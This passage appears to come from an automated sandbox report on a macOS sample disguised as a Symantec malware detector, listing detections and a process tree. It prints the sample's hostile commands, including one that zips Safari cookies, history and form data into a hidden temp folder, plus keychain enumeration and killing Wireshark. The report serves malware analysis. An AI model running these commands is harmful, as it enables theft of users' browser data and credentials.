Source: /bin/sh (PID: 534)Kills 'Wireshark' processes: killall Wireshark

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: kern.safeboot (1.66)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: kern.safeboot (1.66)
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configurationShow sources
Source: /bin/sh (PID: 494)Csrutil executable: /usr/bin/csrutil -> csrutil status

Language, Device and Operating System Detection:

barindex
Reads the system or server version plist fileShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 504)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/sw_vers (PID: 552)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Queries OS software version with shell command 'sw_vers'Show sources
Source: /usr/bin/perl5.18 (PID: 552)sw_vers executed: /usr/bin/sw_vers -productVersion
Reads hardware related sysctl valuesShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: hw.availcpu (6.25)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.ncpu (6.3)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.cpu_freq (6.15)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version valueShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl read request: kern.osversion (1.65)
Source: /tmp/xpc.app/Contents/MacOS/xpc (PID: 505)Sysctl read request: kern.osversion (1.65)
Reads the systems OS release and/or typeShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.ostype (1.1)
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.osrelease (1.2)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.ostype (1.1)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 513)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 516)Sysctl requested: kern.osrelease (1.2)
Reads the systems hostnameShow sources
Source: /Users/vreni/Desktop/unpack/Symantec Malware Detector.app/Contents/MacOS/Symantec Malware Detector (PID: 476)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 478)Sysctl requested: kern.hostname (1.10)
Source: /sbin/route (PID: 479)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 481)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 482)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 483)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 484)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 486)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 488)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 489)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 493)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 494)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 495)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 495)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 496)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 498)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 500)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 501)Sysctl requested: kern.hostname (1.10)
Source: /System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python (PID: 503)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 506)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 509)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 511)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 514)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 517)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 519)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 521)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 523)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 525)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 527)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 529)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 530)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 531)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 532)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 537)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 539)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 543)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 544)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 545)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 546)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 547)Sysctl requested: kern.hostname (1.10)
Source: /usr/bin/sudo (PID: 550)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 553)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 554)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 555)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 556)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 557)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 559)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 560)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 562)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 564)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 565)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 566)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 567)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 568)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 569)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 570)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 571)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 572)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 573)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 574)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 575)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 577)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 578)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 579)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 581)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 583)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 585)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 586)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 587)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 591)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 592)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 593)Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

barindex
Archives Safari's bookmarks and may steal themShow sources
Source: /bin/sh (PID: 485)Zips Safari's bookmarks : /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's cookies and may steal themShow sources
Source: /bin/sh (PID: 485)Zips Safari's cookies: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's history database and may steal itShow sources
Source: /bin/sh (PID: 485)Zips Safari's history DB: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
Archives Safari's saved forms and may steal themShow sources
Source: /bin/sh (PID: 485)Zips Safari's saved forms: /usr/bin/zip -> zip -qr /tmp/.dio3we/SAFARI.zip /Users/vreni/Library/Cookies /Users/vreni/Library/Safari/History.db /Users/vreni/Library/Safari/Bookmarks.plist /Users/vreni/Library/Safari/Form Values
May steal keychain information which contains credentialsShow sources
Source: /usr/bin/zip (PID: 487)Keychain directory enumerated: /Users/vreni/Library/Keychains
Source: /usr/bin/zip (PID: 487)Keychain directory enumerated: /Library/Keychains


Runtime Messages

Command:open
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Screenshot

cam-macmac-stand

Startup

  • system is mac1
  • xpcproxy (PID: 476 PPID: 1 MD5: b2faf9621ba8f5b2bcea6ee7d572a8b7)
  • Symantec Malware Detector (PID: 476 PPID: 1 Overlayed Process Image: xpcproxy MD5: 649e5b24e70469a3e32bbe81d7b79c51)
    • sh (PID: 478 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 479 PPID: 478 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • route (PID: 479 PPID: 478 Overlayed Process Image: sh MD5: f089fa45eace1b314bcf55873f119009)
      • sh (PID: 480 PPID: 478 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • awk (PID: 480 PPID: 478 Overlayed Process Image: sh MD5: f3018baf92b308f79410d303b5186198)
    • sh (PID: 481 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • mkdir (PID: 481 PPID: 476 Overlayed Process Image: sh MD5: 00efa095a9110a312bf9115afb361764)
    • sh (PID: 482 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • cp (PID: 482 PPID: 476 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)
    • sh (PID: 483 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • rm (PID: 483 PPID: 476 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
    • sh (PID: 484 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 485 PPID: 484 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 485 PPID: 484 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
    • sh (PID: 486 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 487 PPID: 486 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • zip (PID: 487 PPID: 486 Overlayed Process Image: sh MD5: 135ed1f0d2d93d1581715999e16cdeed)
    • sh (PID: 488 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 489 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 490 PPID: 489 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • find (PID: 490 PPID: 489 Overlayed Process Image: sh MD5: 64fb7128066436f7954ecd6eaf22b2ad)
      • sh (PID: 491 PPID: 489 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • xargs (PID: 491 PPID: 489 Overlayed Process Image: sh MD5: c6d00867556e63bf737b9388cd0a4e2a)
        • xargs (PID: 492 PPID: 491 MD5: c6d00867556e63bf737b9388cd0a4e2a)
        • rm (PID: 492 PPID: 491 Overlayed Process Image: xargs MD5: e8926d2347850b76f57a1d5f0226de8b)
    • sh (PID: 493 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • screencapture (PID: 493 PPID: 476 Overlayed Process Image: sh MD5: 4cceb3050c6d578dd74c2e77432917bf)
    • sh (PID: 494 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • csrutil (PID: 494 PPID: 476 Overlayed Process Image: sh MD5: a6d524206caf8757113bbda7ba57e267)
    • sh (PID: 495 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sudo (PID: 495 PPID: 476 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
    • sh (PID: 496 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 497 PPID: 496 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 498 PPID: 496 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 498 PPID: 496 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 499 PPID: 498 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • echo (PID: 499 PPID: 498 Overlayed Process Image: sudo MD5: 28aaba1826ce568b1eec9cf71ad0655c)
    • sh (PID: 500 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 501 PPID: 476 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 502 PPID: 501 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • unzip (PID: 502 PPID: 501 Overlayed Process Image: sh MD5: e781ae6c3e793781508fc3531b386246)
      • sh (PID: 503 PPID: 501 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • xattr (PID: 503 PPID: 501 Overlayed Process Image: sh MD5: e2ca6555fe4b8c6a97d1ced2156c9b69)
      • Python (PID: 503 PPID: 501 Overlayed Process Image: xattr MD5: f932378ef838dcd40e9b7e55e7d7b9a0)
      • sh (PID: 504 PPID: 501 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • open (PID: 504 PPID: 501 Overlayed Process Image: sh MD5: 6056e93dd048a99ee5566de0f1527271)
  • xpcproxy (PID: 505 PPID: 1 MD5: b2faf9621ba8f5b2bcea6ee7d572a8b7)
  • xpc (PID: 505 PPID: 1 Overlayed Process Image: xpcproxy MD5: 4ffc432cfc0fd82c9252b6e206830dcb)
    • sh (PID: 506 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 507 PPID: 506 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • openssl (PID: 507 PPID: 506 Overlayed Process Image: sh MD5: 1689d18d1f1b7b07480d337cc7fc9f43)
    • sh (PID: 509 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 510 PPID: 509 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • nc (PID: 510 PPID: 509 Overlayed Process Image: sh MD5: 2cbc307230ad7cd8050109ea4f2bd078)
    • sh (PID: 511 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 512 PPID: 511 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 513 PPID: 512 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 513 PPID: 512 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 514 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 515 PPID: 514 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • sh (PID: 516 PPID: 515 MD5: 2cc3c26641112c1bd0173f396b7d7662)
        • curl (PID: 516 PPID: 515 Overlayed Process Image: sh MD5: 313ae871e04221163541c8af134351dc)
    • sh (PID: 517 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 518 PPID: 517 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 518 PPID: 517 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 519 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 520 PPID: 519 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 520 PPID: 519 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 521 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 522 PPID: 521 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 522 PPID: 521 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 523 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 524 PPID: 523 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 524 PPID: 523 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 525 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 526 PPID: 525 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 526 PPID: 525 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 527 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 528 PPID: 527 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • ping (PID: 528 PPID: 527 Overlayed Process Image: sh MD5: 339ef1af4113dd065d43d939a1536151)
    • sh (PID: 529 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • sh (PID: 530 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • cat (PID: 530 PPID: 505 Overlayed Process Image: sh MD5: 3fb0e3ca64776d182c422400a09673c3)
    • sh (PID: 531 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
    • rm (PID: 531 PPID: 505 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
    • sh (PID: 532 PPID: 505 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 533 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 533 PPID: 532 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 534 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • killall (PID: 534 PPID: 532 Overlayed Process Image: sh MD5: e27cce82be3cba31a2486d00964d1c5e)
      • sh (PID: 535 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • rm (PID: 535 PPID: 532 Overlayed Process Image: sh MD5: e8926d2347850b76f57a1d5f0226de8b)
      • sh (PID: 536 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 537 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 537 PPID: 532 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 538 PPID: 537 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • mkdir (PID: 538 PPID: 537 Overlayed Process Image: sudo MD5: 00efa095a9110a312bf9115afb361764)
      • sh (PID: 539 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 539 PPID: 532 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 540 PPID: 539 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • chmod (PID: 540 PPID: 539 Overlayed Process Image: sudo MD5: ecb64579c6dd0ebee31bf8e4d4cdcc6e)
      • sh (PID: 541 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • cp (PID: 541 PPID: 532 Overlayed Process Image: sh MD5: a8ebcee2d17317beee2136ec59bfba4d)
      • sh (PID: 542 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • mv (PID: 542 PPID: 532 Overlayed Process Image: sh MD5: 7fb694b9a3c7fd27aa7fca81d5afdfeb)
      • sh (PID: 543 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 543 PPID: 532 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 544 PPID: 543 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sh (PID: 544 PPID: 543 Overlayed Process Image: sudo MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 545 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 545 PPID: 532 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 546 PPID: 545 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sh (PID: 546 PPID: 545 Overlayed Process Image: sudo MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 547 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 547 PPID: 532 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 548 PPID: 547 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • chmod (PID: 548 PPID: 547 Overlayed Process Image: sudo MD5: ecb64579c6dd0ebee31bf8e4d4cdcc6e)
      • sh (PID: 549 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sh (PID: 550 PPID: 532 MD5: 2cc3c26641112c1bd0173f396b7d7662)
      • sudo (PID: 550 PPID: 532 Overlayed Process Image: sh MD5: 7d986f7707c0f11264989cd7105ea80d)
        • sudo (PID: 551 PPID: 550 MD5: 7d986f7707c0f11264989cd7105ea80d)
        • kickstart (PID: 551 PPID: 550 Overlayed Process Image: sudo MD5: 0774d8bfac77a96f80a4a1049e0e1730)
        • perl5.18 (PID: 551 PPID: 550 Overlayed Process Image: kickstart MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • perl5.18 (PID: 552 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sw_vers (PID: 552 PPID: 551 Overlayed Process Image: perl5.18 MD5: b1668c2003c554a75688384652e92e2b)
          • perl5.18 (PID: 553 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 553 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 553 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 554 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 554 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 554 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 555 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 555 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 555 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 556 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 556 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 556 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 557 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 557 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 557 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 558 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 558 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 558 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 559 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 559 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 559 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 560 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 560 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 560 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 561 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 561 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 561 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 562 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 562 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 562 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 563 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 563 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 563 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 564 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 564 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 564 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 565 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 565 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 565 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 566 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 566 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 566 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 567 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
          • sh (PID: 567 PPID: 551 Overlayed Process Image: perl5.18 MD5: 2cc3c26641112c1bd0173f396b7d7662)
          • dscl (PID: 567 PPID: 551 Overlayed Process Image: sh MD5: 492456daec08a84883daad0b84b7b6ee)
          • perl5.18 (PID: 568 PPID: 551 MD5: 7ff8a2c533371abdb867c55957fb9d23)
